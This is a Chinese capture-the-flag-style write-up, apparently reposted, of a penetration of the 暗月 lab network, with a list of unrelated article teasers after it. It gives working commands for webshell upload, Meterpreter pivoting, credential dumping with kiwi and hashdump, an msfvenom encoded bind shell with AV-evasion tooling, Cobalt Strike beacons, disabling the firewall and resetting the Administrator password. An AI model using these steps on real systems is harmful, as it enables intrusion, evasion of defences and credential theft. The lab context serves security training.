暗月内网靶场渗透笔记

news2025/1/24 8:27:00

简介

靶场下载地址:

靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ
提取码: 3p47

虚拟机网络设置:

在这里插入图片描述

靶场拓扑图:

在这里插入图片描述

靶机账号密码:

在这里插入图片描述

信息收集

内网扫描

靶机就在本地,直接进行本地内网扫描即可,扫描当前网段:

nmap -sP 192.168.0.0/24

在这里插入图片描述

只有这一台机子是IP未知的,其他设备都是自己的,故判断为目标靶机

端口扫描

因暗月靶机上都有360和各种安全软件,所以扫描速率不能太快,先使用masscan扫描到开放的端口,再用nmap获取端口的详细信息

masscan -p 1-65535 192.168.0.114 --rate=100
rate:设置为每秒发100个请求包

在这里插入图片描述

一共开放了6个端口,现在使用nmap去获取端口的详细信息

nmap -sV -p 3389,5985,6588,999,21,80 192.168.0.114
sV:扫描端口服务版本
p:扫描指定的端口

在这里插入图片描述

现在去web页面上看看有没有突破点,首先本地DNS解析一下域名

echo "192.168.0.114 www.moonlab.com" >> /etc/hosts

然后访问这个域名

在这里插入图片描述

什么也没有,只能fuzz目录了

FUZZ

需要注意的是,靶机上开启了防火墙和安全软件,网站上也有waf,无论你访问哪个目录都返回200

在这里插入图片描述

如果都返回200,就不能用工具扫了,我们自己写一个简单的python脚本去爆破目录

#encoding:utf-8
from cgitb import reset
import requests
import sys
import time


with open ('dicc.txt','r',encoding='UTF-8') as readfile: #扫描目录所用的字典
  for dirs in readfile.readlines(): #一个for循环,将字典参数导入到dirs变量里
    url = 'http://www.moonlab.com/'+dirs.strip('\n') #扫描的目录
    resp = requests.get(url)  #访问url变量里的值,并将得到的结果导入到resp变量里
    strlen = len(resp.text) #获取文本大小,并将大小导入到strlen变量里
    print(url+' statu: '+str(resp.status_code)+' lens: '+str(strlen)) #输出扫描的结果
    time.sleep(2) #sleep两秒
    if resp.status_code == 200 or resp.status_code == 403 or resp.status_code == 500 or resp.status_code == 301: #if判断,如果请求等于条件,判断为真,继续执行下面的代码
      if str(strlen) !=  "2939": #如果文本大小不等于2939,就为真,继续执行下面的代码
        with open('url.txt','a',encoding='UTF-8') as writefile: #创建一个名为url.txt的文件
          writefile.write(url+' statu: '+str(resp.status_code)+' lens: '+str(strlen)+'\n') #写入内容

执行这个脚本去fuzz目录

python3 urlscan.py

在这里插入图片描述

在这里插入图片描述

其他目录大小都是2939,只有这个目录不一样,我们直接去访问这个目录看看

robots.txt 文件规定了搜索引擎抓取的网站上网址

在这里插入图片描述

拿到shell

这里给出了三个目录,第一个是一个登录页面

在这里插入图片描述

遇到登录页面的渗透测试思路为

sql注入
暴力破解
csrf
js泄露
逻辑漏洞

这个网站后台存在的漏洞为逻辑漏洞,在登录框下面有一个忘记密码,我们输入admin

在这里插入图片描述

随便输入一个答案

在这里插入图片描述

在这里插入图片描述

回到burp,点击http历史,找到输入答案的包

在这里插入图片描述

点击这个包,ctrl+r

在这里插入图片描述

我们把answer参数改为空,然后再发送看看会发生什么

在这里插入图片描述

直接出现了密码,说明网站的验证逻辑有问题,我们用这个账号密码进入后台

在这里插入图片描述

进入后台后,最常见的拿shell方式就是文件上传了,我们需要找到一个能上传文件的页面

在这里插入图片描述

在模板管理这可以修改网站文件,我们随便点击一个

在这里插入图片描述

将冰蝎自带的aspx一句话木马写进去

在这里插入图片描述

然后保存,访问文件

在这里插入图片描述

打开冰蝎连接

在这里插入图片描述

在这里插入图片描述

连接成功

搜集主机信息

获取当前用户全部信息

whoami /all

在这里插入图片描述

在这里插入图片描述

我们只是一个普通用户,但是有这三个特权

获取全部网络信息

ipconfig /all

在这里插入图片描述

这里看到他还有一个内网ip

获取主机详细信息

systeminfo

在这里插入图片描述

查看开放端口

netstat -ano

在这里插入图片描述

查看开启的服务

net start

在这里插入图片描述
在这里插入图片描述

不仅有安全狗,自带的防火墙也开启了

查看后台进程

tasklist

在这里插入图片描述

反向代理

转移shell

我们先将shell转移到msf里,方便利用

在这里插入图片描述

在这里插入图片描述

msf进入监听后,回到冰写,进入反弹shell页面,设置ip和端口,ip是kali的ip,端口是msf设置的端口

在这里插入图片描述

在这里插入图片描述

成功将shell转移到msf里

设置代理

添加网段

查看全局网段

run get_local_subnets

在这里插入图片描述
10.10.1.0/24是他们的内网,我们添加这个网段即可

run autoroute -s 10.10.1.0/24

查看添加的网段

run autoroute -p

在这里插入图片描述

然后输入bg返回msf,使用auxiliary/server/socks_proxy代理模块

bg
use auxiliary/server/socks_proxy

在这里插入图片描述

设置代理的端口,然后运行

set SRVPORT 1234
run

然后新开一个终端,编辑这个文件,拉到最下面,输入msf设置的端口

vim /etc/proxychains4.conf

在这里插入图片描述

保存后退出,然后看看配置成功没

proxychains4 curl 10.10.1.130

在这里插入图片描述

成功访问

拿下windows server 2016-web

提权

回到msf里,进入会话

sessions -i 1

在这里插入图片描述

然后尝试用meterperter的默认提权exp去提权

getsystem

在这里插入图片描述

迁移进程

成功提权到最高权限,通过之前nmap扫描的结果,它已经开启了3389端口,我们导出密码即可,但首先需要迁移进程到一个稳定运行的程序里,这样才能正常导出密码

ps #查看后台进程

随便导入到一个稳定的进程里

在这里插入图片描述

migrate 3344

在这里插入图片描述

查看shell pid号

getpid

在这里插入图片描述

成功迁移了

获取密码

msf导入kiwi

load kiwi

提取密码

creds_all

在这里插入图片描述

成功获取密码,之后用远程桌面连接即可

内网信息收集

查看路由表

arp -a

在这里插入图片描述

我们拿下的这台主机内网ip是10.10.1.131,这个10.10.1.130是未知的,估计是内网的另一台主机

由于内网另一台机子开启了防护软件,无法ping通和扫描,我们直接访问80端口去测试

浏览器设置代理

在这里插入图片描述

访问10.10.1.130

在这里插入图片描述

拿下Windows server 2012-oa

这是一个通达的后台OA,Google搜索相关的漏洞和poc即可

https://pan.baidu.com/s/14aKGmg_jmyAJHzHjgYJQHQ

提取码:hx1y

进入文件夹后运行这个命令

proxychains4 java -jar 通达OA综合利用工具_圈子社区专版.jar

在这里插入图片描述

在这里插入图片描述

启动哥斯拉连接这个url

https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla

在这里插入图片描述

在这里插入图片描述

连接成功

NetSh Advfirewall set allprofiles state off

关闭windows防火墙

拿下最终主机

转移shell

由于目标不出网,我们只能生成一个正向shell木马来将shell转移到msf里

msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/shikata_ga_nai -i 20 -f c -o 123.txt

使用这个工具进行一个简单的免杀

https://github.com/1y0n/AV_Evasion_Tool/releases/tag/2.0

打开这个工具,将msfveno生成的123.txt文件里的内容粘贴上去

在这里插入图片描述

回到哥斯拉,找一个文件夹上传木马

在这里插入图片描述

回到msf,设置监听模块

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.1.130
set lport 4444
options
run

在这里插入图片描述

终端执行这个木马

在这里插入图片描述

在这里插入图片描述

成功连接

迁移进程

首先需要迁移进程到一个稳定运行的程序里,这样才能正常导出密码

ps #查看后台进程

随便导入到一个稳定的进程里

在这里插入图片描述

migrate 3756

查看shell pid号

getpid

在这里插入图片描述

迁移成功

转移shell到cs

打开cs,没有的话直接私聊我就好了

监听器设置

在这里插入图片描述

在这里插入图片描述

生成木马

在这里插入图片描述

在这里插入图片描述

回到msf,上传木马

upload /beacon.exe

在这里插入图片描述

进入shell,执行木马

在这里插入图片描述

这个会话是第一台机子windows server 2016-web,上传个木马然后执行就能获得会话

回到cs,连接这个木马
在这里插入图片描述

connect 10.10.1.130 7777

成功获得会话

在这里插入图片描述

在这里插入图片描述

右击会话,点击文件浏览

在这里插入图片描述

在这里插入图片描述

可以看到还有一个域用户

查看当前主机域名

net domain

在这里插入图片描述

查看域控登录的主机信息

net computers

在这里插入图片描述

10.10.1.130是当前主机,而10.10.10.165是最终flag所在的主机

获取域用户密码

hashdump
logonpasswords

在这里插入图片描述

查看密码凭证

在这里插入图片描述

在这里插入图片描述

爆破这个域用户密码

https://www.somd5.com/

在这里插入图片描述

回到msf,进入shell修改密码

net user Administrator Ba1_Ma0123456

在这里插入图片描述

开启10.10.1.130主机的3389端口

run post/windows/manage/enable_rdp

在这里插入图片描述

用第一台我们拿下的主机去连接

在这里插入图片描述

在这里插入图片描述

在这个主机上也使用远程桌面连接

在这里插入图片描述

输入域名\用户名和爆破出的密码

在这里插入图片描述

在这里插入图片描述

成功登录

flag

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/521648.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

朋友去华为面试,轻松拿到30K的Offer,羡慕了......

最近有朋友去华为面试,面试前后进行了20天左右,包含4轮电话面试、1轮笔试、1轮主管视频面试、1轮hr视频面试。 据他所说,80%的人都会栽在第一轮面试,要不是他面试前做足准备,估计都坚持不完后面几轮面试。 其实&…

OpenGL高级-几何着色器

几何着色器的介绍 在顶点和片段着色器之间有一个可选的着色器,叫做几何着色器(Geometry Shader)。几何着色器以一个或多个表示为一个单独基本图形(primitive)的顶点作为输入,比如可以是一个点或者三角形。几何着色器在将这些顶点发…

C++14中lambda表达式新增加的features的使用

lambda表达式是在C11中引入的,它们可以嵌套在其它函数甚至函数调用语句中,C11中lambda表达式的使用参考:https://blog.csdn.net/fengbingchun/article/details/52653313 lambda表达式语法如下:除capture和body是必须的&#xff0c…

索引的作用与结构(数据库)

目录 一、索引概述 1、什么叫索引 2、索引的作用 二、SQL Server索引下的数据组织结构 1.堆集结构 2.聚集索引结构 3.非聚集索引 4.扩展盘区空间的管理 一、索引概述 1、什么叫索引 数据库中的索引与书籍中的索引类似&…

【数据分享】2014-2023年全国各监测站点的逐时、逐日、逐月、逐年AQI数据

空气质量的好坏反映了空气的污染程度,在各项涉及城市环境的研究中,空气质量都是一个十分重要的指标。空气质量是依据空气中污染物浓度的高低来判断的。 我们发现学者王晓磊在自己的主页里面分享了2014年5月以来的全国范围的到站点(全国有约2…

小实验:关于期望的乘法性质

小实验:关于期望的乘法性质 引言个人疑惑验证过程样本生成实验过程 附:完整代码 引言 本节通过代码实现期望的乘法性质。 个人疑惑 在数学期望的定义中,有一条随机变量期望的乘法性质: 当随机变量 X , Y \mathcal X,\mathcal Y…

spring如何处理循环依赖

何为循环依赖 所谓的循环依赖,就是两个或者两个以上的bean互相依赖对方,最终形成闭环。比如“A对象依赖B对象,而B对象也依赖A对象”,或者“A对象依赖B对象,B对象依赖C对象,C对象依赖A对象”;类…

MySQL笔记-多表查询

本文标签 : 多表查询 事务四大特性 并发事务问题 事务隔离级别 文章目录 目录 文章目录 一、多表查询 1.多表关系 2.多表查询概念 3.多表查询的分类 4.内连接 5.外连接 6.自连接 7.联合查询 8.子查询 1.标量子查询 2.列子查询 3.行子查询 4.表子查询 9.多表查询案例练习 二…

springboot+vue汉服文化平台网站(源码+文档)

风定落花生,歌声逐流水,大家好我是风歌,混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的汉服文化平台网站。项目源码以及部署相关请联系风歌,文末附上联系信息 。 💕💕作者:风…

初阶数据结构之带头+双向+循环链表增删查实现(三)

文章目录 [TOC](文章目录) 前言一、带头双向循环链表的初始化1.1带头双向循环链表的结构体定义1.2初始化代码的实现 二、带头双向循环链表的增功能实现2.1头插代码的实现2.2尾插代码的实现 三、带头双向循环链表的打印功能实现3.1打印代码的实现 四、带头双向循环链表删功能实现…

国开电大《WEB开发基础》形考任务【答案】实验1-5:电商网站前端页面内容编写

国开电大《WEB开发基础》形考任务1 国开电大《WEB开发基础》形考任务1 国开电大《WEB开发基础》形考任务3 国开电大《WEB开发基础》形考任务4 国开电大《WEB开发基础》形考任务5 作业答案 联系QQ:1603277115 【目标】根据素材中的设计图,编写网站首页,查…

AcWing算法提高课-1.3.6货币系统

宣传一下算法提高课整理 <— CSDN个人主页&#xff1a;更好的阅读体验 <— 本题链接&#xff08;AcWing&#xff09; 点这里 题目描述 给你一个n种面值的货币系统&#xff0c;求组成面值为m的货币有多少种方案。 输入格式 第一行&#xff0c;包含两个整数n和m。 接…

Vue3-黑马(七)

目录&#xff1a; &#xff08;1&#xff09;vue3-基础-子组件1 &#xff08;2&#xff09;vue3-基础-子组件2 &#xff08;3&#xff09;vue3-进阶-antdv-入门 &#xff08;1&#xff09;vue3-基础-子组件1 之前我们的例子里只使用了一个vue的组件&#xff0c;那么在这个…

近40个开源的工业软件-工业4.0

不同的工业流程&#xff0c;需要不同的工业软件。面向研发设计环节的开源软件&#xff0c;今天就来介绍一下面向生产控制环节的开源软件&#xff0c;主要为可编程逻辑控制器&#xff08;PLC)、分布式控制系统&#xff08;DCS&#xff09;、生产执行系统&#xff08;MES&#xf…

人工智能(AI)的应用以及前景

当今世界正迎来人工智能技术的全面爆发&#xff0c;它在各个领域的应用已经展现出了巨大的潜力和优势。下面&#xff0c;我们来探讨一下人工智能在不同领域中的应用。 首先&#xff0c;人工智能在医疗领域中的应用已经逐渐成为了现实。医疗机构可以利用人工智能技术&#xff0…

Java学习(13)(异常的概念、异常的体系结构、异常的分类、异常的处理【防御式编程、异常的抛出、异常的捕获、异常的处理流程】、自定义异常类 )

接上次博客&#xff1a;Java学习&#xff08;12&#xff09;&#xff08;String类、String的查找方法、字符串转化、 替换、拆分、截取、trim方法、字符串的不可变性、StringBuilder和StringBuffer&#xff09;_di-Dora的博客-CSDN博客 目录 异常的概念 异常的体系结构 异常…

【Python基础知识点总结】

Python基础知识点总结 思维导图基础数据类型数据结构基础语法高级语法简单编程题工程项目类石头剪子布扑克发牌学生成绩管理系统 思维导图 基础数据类型 布尔(bool) True False字符(str) ‘hello Python’整型(int) -1,5,88浮点(float) -2.3,4.1 数据结构 字典 {“position”…

springboot+vue交流互动系统(源码+文档)

风定落花生&#xff0c;歌声逐流水&#xff0c;大家好我是风歌&#xff0c;混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的交流互动系统。项目源码以及部署相关请联系风歌&#xff0c;文末附上联系信息 。 &#x1f495;&#x1f495;作者&#xff1a;风歌&a…

Springmvc练习二

1、网站练习&#xff0c;先清楚原理&#xff0c;便于拓展 注意一点就是页面定位的问题&#xff0c;如果你springmvc文件没有配置加上后缀“.jsp”的设置记得在网站控制器源代码的基础上加上“.jsp” 2、简单尝试一下就知道&#xff0c;这里所谓的参数绑定无非就是在java代码的…

【ChatGPT】ChatGPT国内镜像网站集合

Yan-英杰的主页 悟已往之不谏 知来者之可追 C程序员&#xff0c;2024届电子信息研究生 目录 什么是ChatGPT镜像&#xff1f; 亲测&#xff1a; 一、二狗问答(AI对话) 二、AiDuTu 三、WOChat 四、ChatGPT(个人感觉最好用) 我们可以利用ChatGPT干什么&#xff1f; 一、三分…